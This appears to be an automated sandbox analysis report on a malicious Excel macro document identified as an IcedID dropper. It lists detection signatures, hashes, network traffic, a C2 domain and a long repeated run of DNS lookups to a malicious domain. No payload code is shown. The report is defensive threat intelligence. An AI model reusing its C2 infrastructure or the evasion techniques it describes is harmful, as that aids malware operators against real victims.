Analysis Report document-1251000362.xlsm

Overview

General Information

Sample Name:	document-1251000362.xlsm
Analysis ID:	382870
MD5:	09217c79f99bbfe977a80d83d62489c7
SHA1:	da600d355dfb57190a5745342f3cfeb7d1e509f1
SHA256:	7bf8049e4766a2985851a3d3bf01710c53c389fe1e54397fa332672b62b649d8
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office process drops PE file

Outdated Microsoft Office dropper detected

Performs DNS queries to domains with low reputation

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query network adapater information

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection:

Found malware configuration

Source: 3.2.rundll32.exe.390000.0.raw.unpack

Malware Configuration Extractor: IcedID {"C2 url": "usaaforced.fun"}

Multi AV Scanner detection for submitted file

Source: document-1251000362.xlsm

Metadefender: Detection: 13%

Perma Link

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 3003[1].gif.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: metaflip.io

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: usaaforced.fun

Outdated Microsoft Office dropper detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: agenbolatermurah.com is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: agenbolatermurah.com is down

Performs DNS queries to domains with low reputation

Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
